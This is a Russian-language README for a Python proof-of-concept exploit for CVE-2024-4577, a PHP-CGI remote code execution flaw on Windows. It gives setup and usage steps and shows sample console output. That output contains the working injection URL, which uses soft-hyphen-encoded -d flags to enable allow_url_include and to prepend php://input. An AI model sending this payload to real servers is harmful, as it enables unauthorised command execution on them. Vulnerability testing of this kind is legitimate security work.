
Эксплойт Proof of Concept для удаленного выполнения кода (RCE) для критической уязвимости в PHP <8.2.15 (Windows), позволяющий злоумышленникам выполнять произвольные команды.
Серьёзная уязвимость безопасности существует в CGI-режиме PHP, которая позволяет злоумышленникам выполнять произвольные команды, манипулируя параметрами URL.
Перед запуском скрипта убедитесь, что в вашей системе установлен Python 3. Кроме того, вам понадобится библиотека requests для обработки HTTP-запросов.
Вы можете установить необходимые зависимости с помощью pip. Если pip не установлен, следуйте инструкциям здесь.
requests:pip install requests
Чтобы проверить целевой URL на уязвимость CVE-2024-4577, выполните следующие шаги:
python3 exploit.py <target>
Например, чтобы проверить URL http://example.com, выполните:
python3 exploit.py http://example.com
Скрипт проверит указанный целевой URL на наличие уязвимости и выведет результаты в консоль. Он покажет, была ли найдена потенциальная уязвимость или уязвимость не обнаружена.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
Эта уязвимость была найдена Orange Tsai (@orange_8361)